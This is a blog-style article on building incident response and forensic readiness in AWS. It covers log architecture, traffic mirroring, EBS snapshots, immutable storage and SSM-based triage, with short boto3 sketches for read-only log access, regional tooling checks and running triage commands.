When it comes to incident response (IR) in the cloud, especially with AWS, having the right security accounts and forensic tools in place is essential for efficient investigations. Cloud-based incidents often involve extensive log analysis, which can be complex given the various ways AWS stores and manages logs. Additionally, dealing with network forensics in environments using VPCs and EC2 instances requires preparation with tools for both disk-based and network-based analysis.

Accessing Logs for Cloud Investigations

One of the main challenges in cloud incident response is accessing and analyzing logs. Logs can be stored in various formats and locations within AWS. For example:

VPC flow logs might be archived in S3 buckets or sent to CloudWatch for real-time processing.
Organizations may centralize logs in dedicated log archive accounts or aggregate them into a security account for streamlined access, as the sketch below illustrates.
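In a setup like this, the security team typically reaches archived logs by assuming a read-only role in the log archive account. Here is a minimal boto3 sketch of that pattern; the role ARN, account ID, and bucket name are hypothetical placeholders, not a prescribed layout.

```python
"""Sketch: cross-account, read-only log access via STS AssumeRole.

Assumes federated credentials are already configured locally; the role
ARN and bucket name below are hypothetical placeholders.
"""
import boto3

sts = boto3.client("sts")

# Assume a read-only role in the dedicated log archive account.
creds = sts.assume_role(
    RoleArn="arn:aws:iam::111122223333:role/LogArchiveReadOnly",  # hypothetical
    RoleSessionName="ir-log-review",
)["Credentials"]

# Build an S3 client from the temporary credentials.
s3 = boto3.client(
    "s3",
    aws_access_key_id=creds["AccessKeyId"],
    aws_secret_access_key=creds["SecretAccessKey"],
    aws_session_token=creds["SessionToken"],
)

# List archived logs as a quick sanity check that access works.
for obj in s3.list_objects_v2(
    Bucket="example-log-archive",  # hypothetical archive bucket
    Prefix="AWSLogs/",
).get("Contents", []):
    print(obj["Key"])
```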
When preparing your environment, create a clear logging architecture across all accounts, ensuring read-only access to critical logs. This allows your security team to quickly access the data without worrying about unauthorized modifications.

Additionally, you may configure a security account to subscribe to logs from other accounts via CloudWatch. This can centralize log management, allowing custom views and integration with SIEM tools for better incident tracking. However, be mindful of potential costs and redundancy if logs are already being stored elsewhere.

-------------------------------------------------------------------------------------------------------------

Capturing Network Data: VPC Traffic Mirroring and PCAP

If your organization uses VPCs and EC2 instances, VPC traffic mirroring is a critical tool for capturing network traffic in real time. This feature can provide PCAP data, which is often pivotal in identifying and analyzing suspicious network behavior. By setting up traffic mirroring, you can send real-time network data to your analysis environment, ensuring that no important traffic is missed during an investigation.

Forensic readiness in AWS also includes using Elastic Block Storage (EBS) snapshots to capture disk images. Snapshots are quick and easy to create, allowing you to preserve the state of an EC2 instance at a specific moment in time. These snapshots can be shared with your security account for further analysis. Be sure that your team has access to the relevant encryption keys if the EBS volume is encrypted.

-------------------------------------------------------------------------------------------------------------

Ensuring Secure and Compliant Data Handling

When dealing with sensitive data, security and compliance are paramount. For example:

Use S3 Object Lock to make logs immutable, preventing them from being altered or deleted during an investigation.
Enable S3 Versioning to keep track of changes and allow easy recovery of previous versions.
Implement MFA Delete to enforce multi-factor authentication before any versions can be deleted, adding an extra layer of protection.

For long-term storage, S3 Glacier offers a cost-effective solution for storing logs and forensic data while still providing the flexibility to retrieve data when needed.

-------------------------------------------------------------------------------------------------------------

Deploying Security Tools Across AWS Regions

One of the unique aspects of working in AWS is the ability to deploy resources across different regions. Since AWS has 25+ regions, ensure that your security tools can be easily deployed wherever your company operates. This is important for:

Speed: It may be quicker to access data from the same region where it was generated rather than transferring it across regions.
Cost: Cross-region data transfers incur additional fees, so keeping analysis local can save money.
Compliance: In some cases, privacy laws may restrict moving data across national borders, even within AWS.

Deploying clean instances of your security tooling in each region ensures you can respond quickly without jurisdictional or logistical hurdles; a quick way to audit that coverage is sketched below.
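One low-effort approach is to enumerate the regions your account can see and check each one for your tooling. The boto3 sketch below assumes tooling AMIs are tagged "Purpose: ir-tooling", which is a hypothetical naming convention, not an AWS standard.

```python
"""Sketch: check per-region availability of security tooling AMIs.

Assumes boto3 and configured credentials; the "Purpose: ir-tooling"
tag is a hypothetical convention for this example.
"""
import boto3

# Enumerate every region enabled for this account.
regions = [
    r["RegionName"]
    for r in boto3.client("ec2", region_name="us-east-1").describe_regions()["Regions"]
]

for region in regions:
    ec2 = boto3.client("ec2", region_name=region)
    # Look for AMIs we own that are tagged as IR tooling (hypothetical tag).
    images = ec2.describe_images(
        Owners=["self"],
        Filters=[{"Name": "tag:Purpose", "Values": ["ir-tooling"]}],
    )["Images"]
    status = "ready" if images else "MISSING tooling AMI"
    print(f"{region}: {status}")
```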
-------------------------------------------------------------------------------------------------------------

Secure Communications During Incident Response

During an incident, secure communication is critical. Advanced attackers have been known to monitor security teams, so ensure you have a secure communication plan in place. This could involve using dedicated cloud resources outside your usual business channels to avoid being compromised during critical moments. Whether hosted on AWS or another provider, the key is to have a secure, well-thought-out system in place before an incident occurs.

-------------------------------------------------------------------------------------------------------------

Automating Triage and Evidence Collection

Automation plays a vital role in speeding up incident response. AWS Systems Manager (SSM) is a powerful tool for automating tasks such as running triage scripts or gathering evidence from EC2 instances. The SSM agent, commonly installed on AWS hosts, can also be used on-premise or in other cloud environments, providing flexibility across different systems.

For example, incident responders can use the SSM agent to attach a shared EBS volume to a running EC2 instance, capturing volatile memory or other critical data without using privileged accounts. This minimizes risk and ensures evidence is collected efficiently. AWS also provides a range of automation scripts that leverage Systems Manager to extract data for later analysis, significantly improving response times during an incident. A sketch of this pattern follows.
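To give a feel for the Run Command pattern, here is a minimal boto3 sketch that executes a couple of triage commands on a suspect instance via the built-in AWS-RunShellScript document and waits for the output. The instance ID, bucket name, and commands are hypothetical placeholders.

```python
"""Sketch: triage a suspect instance via SSM Run Command.

Assumes the target instance has a working SSM agent and instance
profile; the instance ID, bucket, and commands are hypothetical.
"""
import boto3

ssm = boto3.client("ssm")

TARGET = "i-0123456789abcdef0"  # hypothetical suspect instance

# Run simple triage commands on the suspect instance.
cmd = ssm.send_command(
    InstanceIds=[TARGET],
    DocumentName="AWS-RunShellScript",          # built-in SSM document
    Parameters={"commands": [
        "uname -a",
        "ps aux --sort=-%cpu | head -n 20",
    ]},
    OutputS3BucketName="example-triage-output",  # hypothetical evidence bucket
)
command_id = cmd["Command"]["CommandId"]

# Block until the command finishes (the waiter raises if it fails),
# then fetch and print its output.
ssm.get_waiter("command_executed").wait(CommandId=command_id, InstanceId=TARGET)

result = ssm.get_command_invocation(CommandId=command_id, InstanceId=TARGET)
print(result["Status"])
print(result["StandardOutputContent"])
```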
-----------------------------------------------------------------------------------------------------------

Practice and Plan for Incident Response

Just as in sports, the key to successful incident response is practice. AWS offers incident simulation scenarios to help teams prepare for real-world situations. These simulations help identify gaps in your plan and provide opportunities to optimize processes. By regularly practicing these scenarios, your team can improve their confidence and ability to handle incidents effectively.

-----------------------------------------------------------------------------------------------------------

Conclusion

Building an efficient incident response strategy in AWS requires a combination of planning, tooling, and automation. By leveraging AWS features like flow logs, VPC traffic mirroring, and EBS snapshots, security teams can gain deep visibility into both network and disk activity. Automation tools, such as AWS Systems Manager, further enhance the response by simplifying evidence collection and triage.

Akash Patel